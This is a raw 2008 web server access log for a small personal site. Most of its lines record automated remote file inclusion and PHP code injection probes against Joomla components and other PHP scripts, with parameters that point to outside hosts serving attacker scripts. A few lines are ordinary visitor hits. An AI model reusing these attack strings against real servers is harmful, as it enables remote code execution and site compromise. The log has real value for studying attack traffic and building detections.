66.40.52.30 - - [03/Nov/2008:06:16:23 -0600] "GET /logs/access_log.1214438400//db.php?path_local=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.800"
89.218.85.18 - - [03/Nov/2008:06:16:23 -0600] "GET /logs//db.php?path_local=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:06:17:15 -0600] "GET /logs/access_log.1214438400//db.php?path_local=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:06:18:09 -0600] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:06:18:09 -0600] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
66.197.201.69 - - [03/Nov/2008:06:18:14 -0600] "GET /logs/access_log.1214179200//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:06:18:14 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:06:18:14 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:06:18:14 -0600] "GET /logs/access_log.1214524800//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
89.218.85.18 - - [03/Nov/2008:06:18:19 -0600] "GET /logs/access_log.1214438400//db.php?path_local=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
66.40.52.30 - - [03/Nov/2008:06:19:12 -0600] "GET /logs/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:06:19:12 -0600] "GET /errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:06:19:23 -0600] "GET /logs/errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:06:19:23 -0600] "GET /errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.800"
66.197.201.69 - - [03/Nov/2008:06:19:26 -0600] "GET /logs/access_log.1214179200%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
64.106.143.80 - - [03/Nov/2008:06:21:31 -0600] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.hexapharm.com/extranet/files/8/id.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
64.106.143.80 - - [03/Nov/2008:06:21:31 -0600] "GET //admin/frontpage_right.php?loadadminpage=http://www.hexapharm.com/extranet/files/8/id.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
64.106.143.80 - - [03/Nov/2008:06:21:31 -0600] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.hexapharm.com/extranet/files/8/id.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
64.106.143.80 - - [03/Nov/2008:06:21:31 -0600] "GET //admin/frontpage_right.php?loadadminpage=http://www.hexapharm.com/extranet/files/8/id.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
62.87.154.41 - - [03/Nov/2008:06:21:32 -0600] "GET /logs///vwar/backup/errors.php?error=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
62.87.154.41 - - [03/Nov/2008:06:21:32 -0600] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
70.85.114.130 - - [03/Nov/2008:06:21:39 -0600] "GET /logs/access_log.1208217600//db.php?path_local=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
70.85.114.130 - - [03/Nov/2008:06:21:49 -0600] "GET //db.php?path_local=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
70.85.114.130 - - [03/Nov/2008:06:21:49 -0600] "GET /logs//db.php?path_local=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
115.131.2.126 - - [03/Nov/2008:06:21:55 -0600] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://images.google.com.au/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&h=364&w=405&sz=67&hl=en&start=13&usg=__AOG-08vzXp9wczLFsjKpCU3Jg8c=&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%2Bflash%26gbv%3D2%26hl%3Den%26sa%3DG""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
115.131.2.126 - - [03/Nov/2008:06:21:56 -0600] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
115.131.2.126 - - [03/Nov/2008:06:21:56 -0600] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
115.131.2.126 - - [03/Nov/2008:06:21:56 -0600] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
115.131.2.126 - - [03/Nov/2008:06:21:56 -0600] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
115.131.2.126 - - [03/Nov/2008:06:22:04 -0600] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
195.3.194.35 - - [03/Nov/2008:06:24:45 -0600] "GET /logs/access_log.1208304000%20//?path%5Bdocroot%5D=http://www.imperaportal.info/amt/pepekid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
195.3.194.35 - - [03/Nov/2008:06:25:42 -0600] "GET /logs/access_log.1208304000%20//?path%5Bdocroot%5D=http://bugisku.com/chid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
78.31.64.178 - - [03/Nov/2008:06:26:05 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
78.31.64.178 - - [03/Nov/2008:06:26:05 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
78.31.64.178 - - [03/Nov/2008:06:26:10 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
78.31.64.178 - - [03/Nov/2008:06:26:10 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
220.236.241.96 - - [03/Nov/2008:06:26:21 -0600] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://www.usarmygermany.com/""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
193.53.23.32 - - [03/Nov/2008:06:26:22 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
193.53.23.32 - - [03/Nov/2008:06:26:23 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
220.236.241.96 - - [03/Nov/2008:06:26:25 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
78.31.64.178 - - [03/Nov/2008:06:26:29 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:06:26:34 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:06:26:34 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:06:26:34 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:06:26:34 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:06:26:34 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:06:26:34 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:06:26:34 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:06:26:34 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
82.78.216.197 - - [03/Nov/2008:06:26:35 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.813"
82.78.216.197 - - [03/Nov/2008:06:26:36 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.813"
80.93.57.207 - - [03/Nov/2008:06:26:42 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
64.106.143.80 - - [03/Nov/2008:06:26:42 -0600] "GET //admin/frontpage_right.php?loadadminpage=http://www.hexapharm.com/extranet/files/8/id.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
80.93.57.207 - - [03/Nov/2008:06:26:42 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
82.78.216.197 - - [03/Nov/2008:06:26:46 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.813"
80.93.57.207 - - [03/Nov/2008:06:26:57 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
80.93.57.207 - - [03/Nov/2008:06:26:58 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
82.78.216.197 - - [03/Nov/2008:06:27:07 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.813"
82.78.216.197 - - [03/Nov/2008:06:27:08 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.813"
70.38.12.204 - - [03/Nov/2008:06:27:09 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:06:27:09 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
213.247.43.5 - - [03/Nov/2008:06:27:13 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
213.247.43.5 - - [03/Nov/2008:06:27:13 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
213.247.43.5 - - [03/Nov/2008:06:27:13 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
213.247.43.5 - - [03/Nov/2008:06:27:14 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
80.93.57.207 - - [03/Nov/2008:06:27:20 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
121.124.127.40 - - [03/Nov/2008:06:27:26 -0600] "GET /logs/access_log.1203724800//errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
121.124.127.40 - - [03/Nov/2008:06:27:26 -0600] "GET //errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
121.124.127.40 - - [03/Nov/2008:06:27:27 -0600] "GET /logs//errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
193.53.23.32 - - [03/Nov/2008:06:27:51 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
193.53.23.32 - - [03/Nov/2008:06:27:51 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
66.197.201.69 - - [03/Nov/2008:06:28:23 -0600] "GET /logs/access_log.1214524800//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:06:28:23 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:06:28:23 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
83.19.144.26 - - [03/Nov/2008:06:28:25 -0600] "GET /logs/access_log.1203724800//errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.76"
83.19.144.26 - - [03/Nov/2008:06:28:26 -0600] "GET //errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.76"
83.19.144.26 - - [03/Nov/2008:06:28:26 -0600] "GET /logs//errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.76"
66.197.201.69 - - [03/Nov/2008:06:28:30 -0600] "GET /logs/access_log.1214179200//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
89.218.85.18 - - [03/Nov/2008:06:28:44 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:06:28:44 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
193.95.93.158 - - [03/Nov/2008:06:28:48 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
193.95.93.158 - - [03/Nov/2008:06:28:49 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
193.95.93.158 - - [03/Nov/2008:06:28:54 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
193.95.93.158 - - [03/Nov/2008:06:28:54 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
64.18.162.8 - - [03/Nov/2008:06:29:33 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
64.18.162.8 - - [03/Nov/2008:06:29:33 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
64.18.162.8 - - [03/Nov/2008:06:29:33 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
64.18.162.8 - - [03/Nov/2008:06:29:34 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
64.18.162.8 - - [03/Nov/2008:06:29:34 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
78.31.64.178 - - [03/Nov/2008:06:29:40 -0600] "GET /logs/access_log.1206144000//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
78.31.64.178 - - [03/Nov/2008:06:29:40 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
78.31.64.178 - - [03/Nov/2008:06:29:41 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
193.53.23.32 - - [03/Nov/2008:06:30:03 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
82.78.216.197 - - [03/Nov/2008:06:30:14 -0600] "GET /logs/access_log.1206144000//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.813"
82.78.216.197 - - [03/Nov/2008:06:30:14 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.813"
82.78.216.197 - - [03/Nov/2008:06:30:14 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.813"
70.38.12.204 - - [03/Nov/2008:06:30:29 -0600] "GET /logs/access_log.1206144000//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:06:30:29 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:06:30:29 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
70.38.38.230 - - [03/Nov/2008:06:30:51 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.814"
70.38.38.230 - - [03/Nov/2008:06:30:51 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.814"
70.38.12.204 - - [03/Nov/2008:06:30:54 -0600] "GET /logs/access_log.1206144000//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:06:30:54 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:06:30:54 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
193.95.93.158 - - [03/Nov/2008:06:31:57 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
78.31.64.178 - - [03/Nov/2008:06:32:06 -0600] "GET /logs/access_log.1215302400//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
80.93.57.207 - - [03/Nov/2008:06:32:15 -0600] "GET /logs/access_log.1206144000//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
80.93.57.207 - - [03/Nov/2008:06:32:16 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
80.93.57.207 - - [03/Nov/2008:06:32:16 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
70.85.114.130 - - [03/Nov/2008:06:33:24 -0600] "GET /logs/access_log.1214438400//db.php?path_local=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:06:33:44 -0600] "GET /logs/include/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.l2reloaded.org/editor/robots.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:06:33:44 -0600] "GET /include/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.l2reloaded.org/editor/robots.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
82.78.216.197 - - [03/Nov/2008:06:33:57 -0600] "GET /logs/access_log.1215302400//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.813"
193.53.23.32 - - [03/Nov/2008:06:34:43 -0600] "GET /logs/access_log.1206144000//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
193.53.23.32 - - [03/Nov/2008:06:34:43 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
193.53.23.32 - - [03/Nov/2008:06:34:43 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
193.95.93.158 - - [03/Nov/2008:06:35:05 -0600] "GET /logs/access_log.1206144000//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
193.95.93.158 - - [03/Nov/2008:06:35:05 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
193.95.93.158 - - [03/Nov/2008:06:35:05 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
80.93.57.207 - - [03/Nov/2008:06:35:19 -0600] "GET /logs/access_log.1215302400//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:06:35:25 -0600] "GET /logs/access_log.1215302400//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
208.75.224.226 - - [03/Nov/2008:06:35:31 -0600] "GET //inc/formmail.inc.php?script_root=http://www.jjran.com/board/skin/zero_vote/id.txt???? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
208.75.224.226 - - [03/Nov/2008:06:35:31 -0600] "GET /logs//inc/formmail.inc.php?script_root=http://www.jjran.com/board/skin/zero_vote/id.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
70.38.12.204 - - [03/Nov/2008:06:35:49 -0600] "GET /logs/access_log.1215302400//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:06:36:10 -0600] "GET /logs/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:06:36:10 -0600] "GET /errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.124.127.40 - - [03/Nov/2008:06:36:59 -0600] "GET /logs/access_log.1206230400//errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
89.108.71.148 - - [03/Nov/2008:06:37:02 -0600] "GET /logs/scanhttp://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.808"
